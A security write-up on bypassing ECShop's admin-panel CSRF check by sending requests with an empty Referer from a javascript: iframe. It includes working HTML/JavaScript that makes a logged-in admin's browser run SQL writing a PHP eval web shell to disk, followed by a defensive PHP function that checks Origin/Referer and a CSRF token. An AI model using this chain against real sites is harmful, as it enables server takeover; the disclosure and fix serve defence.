ECShop CSRF defense bypass: CSRF against sensitive admin-panel functions leads to getshell
ECShop's admin panel exposes many sensitive functions that can be triggered via CSRF. The bypass analyzed here sends the request with an empty Referer.
The bypass can be used for CSRF getshell and CSRF database dumps on various ECShop versions; version 2.7.3 and the latest version 2.7.4 were tested.
This article can be seen as a one-stop test of the post at http://zone.wooyun.org/content/744. Thank you for sharing the technique.
Exp1: CSRF getshell using the SQL execution interface together with the physical path disclosure vulnerability.
Create an HTML file with the following content (loading the script from a javascript: URL in the iframe is what makes the browser send the request without a Referer):
```html
<iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe>
```
Create the file http://127.0.0.1/ecshop2.7.4/csrf.js with the following content:
```javascript
var url = "http://127.0.0.1/ecshop2.7.4/admin/sql.php";
// URL-encoded form body; "[physical path]" is the placeholder used in the original writeup
var sendata = "sql=select+%22%3C%3Fphp+%40eval%28%24_POST%5B%27c%27%5D%29%3B%3F%3E%22+into+outfile+%27C%5C[physical path]%5Ctestcsrf.php%27%3B&act=query";
if (window.XMLHttpRequest) {
    var xmlhttp1 = new XMLHttpRequest();
} else {
    var xmlhttp1 = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST", url, true);
xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
```
When a logged-in administrator visits the link, the testcsrf.php file is generated.
This interface is only used as an example. A large number of admin-panel interfaces expose sensitive operations to the same CSRF threat.
Solution:
Stricter filtering: a missing or empty Referer must be treated as cross-site rather than being allowed through, and sensitive admin actions should additionally require a per-session CSRF token.
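As an added illustration of that stricter check (example code written here, not ECShop's own), the following PHP function rejects a request whose Origin and Referer are both absent or empty, which is exactly the state the javascript: iframe trick above produces, and also verifies a per-session token. The host name, the `csrf_token` field and the array shapes are assumptions.

```php
<?php
// Added example (not ECShop code). Returns true only when the request both
// comes from the admin host and carries the session's CSRF token.
function csrf_request_allowed(array $server, array $post, array $session): bool
{
    $allowed_host = 'shop.example.test';   // assumed admin host

    // 1. Source check: prefer Origin, fall back to Referer. If neither is
    //    present (the empty-Referer bypass), reject instead of skipping.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host) || strcasecmp($host, $allowed_host) !== 0) {
        return false;
    }

    // 2. Token check: a random per-session secret embedded in every admin
    //    form as a hidden field; an attacker's page cannot read it.
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);   // constant-time comparison
}

// Constructed sample requests.
$token   = bin2hex(random_bytes(16));       // generated once at login, stored in session
$session = ['csrf_token' => $token];

// Forged request with a blank Referer and no token (the bypass analysed above).
var_dump(csrf_request_allowed(['HTTP_REFERER' => ''], ['act' => 'query'], $session));

// Legitimate submission of the admin form.
var_dump(csrf_request_allowed(
    ['HTTP_REFERER' => 'https://shop.example.test/admin/sql.php'],
    ['act' => 'query', 'csrf_token' => $token],
    $session
));
```

Because some browsers and privacy settings legitimately strip the Referer, the token is the primary control; the source check is defense in depth.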